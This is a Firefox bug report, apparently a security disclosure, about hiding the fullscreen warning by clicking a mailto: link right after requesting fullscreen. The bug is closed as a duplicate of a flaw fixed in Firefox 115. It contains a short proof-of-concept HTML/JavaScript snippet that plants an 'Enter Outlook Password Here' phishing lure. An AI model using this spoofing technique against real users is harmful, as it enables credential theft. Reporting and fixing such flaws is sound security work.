Closed Bug 1837600 Opened 2 years ago Closed 2 years ago

Hide Full Screen Popup Ui Windows with mailto: link

Categories

(Core :: DOM: Core & HTML, defect)

Firefox 114
defect

Tracking

()

RESOLVED DUPLICATE of bug 1816287

People

(Reporter: Puf, Unassigned)

References

Details

Attachments

(1 file)

User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.42

Steps to reproduce:

Using Malito: We Can Hide Full Screen UI Popup on Firefox Browser in Windows

I Have Created HTML Page

And I Have Added a Button & Two Functions in One Button

One Function to Open in Full Screen

Another Function it Clicks Immediately Malito: Link

<script>
function PufOpen() {
document.documentElement.requestFullscreen();
document.documentElement.requestFullscreen();
document.getElementById('myLink').click();
document.getElementById("p").textContent += "Enter Outlook Password Here";

}
</script>

<button onclick="PufOpen();">Open</button>
<p id="p"></p>
<a id="myLink" href="mailto:someone@example.com"></a>

Actual results:

It Open Default Windows Mail Application It Does Not Show Full Screen UI Popup

It Hides the Full Screen Ui Popup

It Does Not Show Full Screen Ui Popop on Other Applications

Thanks for the report. This sounds like an issue that has already been fixed in Firefox version 115. If you can reproduce this in up to date versions of 115, let us know, but for now I'm going to dupe this to the issue that has the fixed.

Group: firefox-core-security → dom-core-security
Status: UNCONFIRMED → RESOLVED
Closed: 2 years ago
Component: Untriaged → DOM: Core & HTML
Duplicate of bug: CVE-2023-37207
Product: Firefox → Core
Resolution: --- → DUPLICATE
Summary: Hide Full Screen Popup Ui Windows → Hide Full Screen Popup Ui Windows with mailto: link
See Also: → CVE-2023-4053
Group: dom-core-security
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Created:
Updated:
Size: